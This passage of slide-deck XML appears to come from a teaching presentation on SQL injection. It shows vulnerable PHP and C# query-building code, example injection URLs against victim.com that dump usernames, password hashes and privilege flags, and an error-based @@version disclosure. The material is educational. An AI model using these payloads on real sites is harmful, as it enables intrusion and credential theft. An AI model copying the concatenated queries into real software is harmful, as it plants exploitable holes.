            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>employee_employee-id_Sept2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The following application passes user input to a dynamically created SQL statement. That input is a table name and three-column names. It then displays information about an employee:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// build dynamic SQL statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$SQL = “SELECT”. $_GET[“column1”]. “,”. $_GET[“column2”]. “,”. $_GET[“column3”]. “ FROM ”. $_GET[“table”];</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> statement</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($SQL);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>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10179685" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Query Assembly - Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1066800"/>
            <a:ext cx="8610600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If an attacker was to substitute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> value for the table name and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>Super_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> fields for the column names, he may be able to display the usernames and passwords for the database users on the system: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/user_details.php?table=users&amp;column1=user&amp;column2=password&amp;column3=Super_priv</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If the injection is successful, the following data could be returned:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+--------------+-------------------------------------------------------------+------------+</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>| user     | password                                                                      | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Super_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> |</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+--------------+-------------------------------------------------------------+------------+</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>| root     | ∗2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19    | Y |</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+--------------+----------------------------------------------------------------+------------+</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>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563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Errors - Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1066800"/>
            <a:ext cx="8915400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Improper handling of errors can introduce a variety of security problems for a Web site, especially  when error codes are displayed to the attacker. Verbose database error messages can be used to extract information from databases on how to construct injections to escape the developer’s query or how to manipulate it to bring back extra data. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The example below is written in C# for ASP.NET and uses a Microsoft SQL Server database  (this database provides the most verbose of error messages). The script dynamically generates and executes an SQL statement when the user selects a user identifier from a drop-down list:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>private void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SelectedIndexChanged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(object sender, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System.EventArgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e)  {</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  // Create a Select statement that searches for a record matching the specific id from the Value property.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  string SQL;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  SQL = “SELECT ∗ FROM table ”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  SQL += “WHERE ID=” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserList.SelectedItem.Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + “”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  catch (Exception err)  {</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lblResults.Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = “Error getting data. ”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … }</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3300" dirty="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8534400" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Errors - Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1143000"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>If an attacker was to substitute the ID value for his own SQL statement (that includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@@version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>), he may be able to use the SQL error message to learn the version of the database system:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value ‘Microsoft SQL Server 2000 - 8.00.534 (Intel X86) Nov 19 2001 13:23:50 Copyright (c) 1988-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3)’ to a column of data type int.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>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685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Incorrectly Handled Multiple Submissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557168" y="990600"/>
            <a:ext cx="9034632" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0"/>
              <a:t>Application developers may attempt to guide the user through an expected process flow, thinking that the user will follow it. In reality, it is often very simple to bypass the expected data flow by requesting resources out of order directly via their URLs. Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2900" dirty="0"/>
              <a:t>The application developer does not think that form2 needs to validate the input because form1 will have performed it. An attacker could call form2 directly, without using form1. The first URL shown here would fail as the input is validated; the second URL would result in a successful SQL injection attack, as the input is not validated:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[1] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>form.php?form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=form1&amp;param=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>       SQL Failed --</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>[2] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>form.php?form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>=form2&amp;param=’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>       SQL Success --</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2209800" y="2133600"/>
          <a:ext cx="8077200" cy="2468880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3101068"/>
                <a:gridCol w="4976132"/>
              </a:tblGrid>
              <a:tr h="2286000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>// process </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>form 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>if ($_GET[“form”] = “form1”){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> // is the parameter a string?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> if (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>is_string</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>($_GET[“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>param</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>”])) {</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>  // get the length of the string and check if it is </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>// within the set boundary?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>  if (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>strlen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>($_GET[“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>param</a:t>
                      </a:r>
